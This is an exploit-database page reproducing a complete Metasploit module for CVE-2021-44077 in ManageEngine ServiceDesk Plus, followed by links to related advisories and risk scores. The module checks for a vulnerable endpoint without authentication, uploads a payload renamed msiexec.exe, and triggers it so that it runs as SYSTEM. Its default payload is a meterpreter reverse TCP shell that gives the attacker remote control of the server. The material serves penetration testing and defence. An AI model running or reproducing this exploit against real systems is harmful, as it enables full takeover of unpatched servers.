ManageEngine ServiceDesk Plus Remote Code Execution

🗓️ 28 Dec 2021 00:00:00Reported by wvu, Y4er, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 622 Views

Exploiting CVE-2021-44077, ManagedEngine ServiceDesk Plus remote code execution, uploads and executes msiexec.exe as SYSTEM account. Vulnerable up to build 11305 but not file upload. Module checks for exploitable build.

Reporter	Title	Published	Views	Family All 35
0day.today	ManageEngine ServiceDesk Plus Remote Code Execution Exploit	28 Dec 202100:00	–	zdt
GithubExploit	Exploit for Missing Authentication for Critical Function in Zohocorp Manageengine_Servicedesk_Plus	8 Dec 202120:24	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Zohocorp Manageengine_Servicedesk_Plus	29 Sep 202214:07	–	githubexploit
ICS	APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus	6 Dec 202112:00	–	ics
ATTACKERKB	CVE-2021-44077	29 Nov 202100:00	–	attackerkb
Circl	CVE-2021-44077	3 Dec 202111:08	–	circl
CISA KEV Catalog	Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability	1 Dec 202100:00	–	cisa_kev
CISA	CISA Adds Five Known Exploited Vulnerabilities to Catalog	1 Dec 202100:00	–	cisa
CISA	CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus	2 Dec 202100:00	–	cisa
CNNVD	ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞	29 Nov 202100:00	–	cnnvd

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',  
'Description' => %q{  
This module exploits CVE-2021-44077, an unauthenticated remote code  
execution vulnerability in ManageEngine ServiceDesk Plus, to upload an  
EXE (msiexec.exe) and execute it as the SYSTEM account.  
  
Note that build 11305 is vulnerable to the authentication bypass but  
not the file upload. The module will check for an exploitable build.  
},  
'Author' => [  
# Discovered by unknown threat actors  
'wvu', # Analysis and exploit  
'Y4er' # Additional confirmation  
],  
'References' => [  
['CVE', '2021-44077'],  
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],  
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],  
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],  
['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],  
['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],  
['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup  
],  
'DisclosureDate' => '2021-09-16',  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Privileged' => true,  
'Targets' => [  
['Windows Dropper', {}]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 8080,  
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')  
)  
  
unless res  
return CheckCode::Unknown('Target failed to respond to check.')  
end  
  
# NOTE: /RestAPI/ImportTechnicians was removed after build 11303  
unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')  
return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')  
end  
  
CheckCode::Appears('/RestAPI/ImportTechnicians is present.')  
end  
  
def exploit  
upload_msiexec  
execute_msiexec  
end  
  
def upload_msiexec  
print_status('Uploading msiexec.exe')  
  
form = Rex::MIME::Message.new  
form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')  
form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',  
'form-data; name="theFile"; filename="msiexec.exe"')  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),  
'ctype' => "multipart/form-data; boundary=#{form.bound}",  
'data' => form.to_s  
)  
  
unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')  
fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')  
end  
  
print_good('Successfully uploaded msiexec.exe')  
end  
  
def execute_msiexec  
print_status('Executing msiexec.exe')  
  
# This endpoint "won't" return  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),  
'vars_post' => {  
'execute' => 's247AgentInstallationProcess'  
}  
}, 0)  
end  
  
# XXX: FileDropper dies a miserable death if the file is in use  
def on_new_session(_session)  
super  
  
# Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7  
print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")  
end  
  
end  
`

28 Dec 2021 00:00Current

0.2Low risk

Vulners AI Score0.2

CVSS 27.5

CVSS 3.19.8

EPSS0.943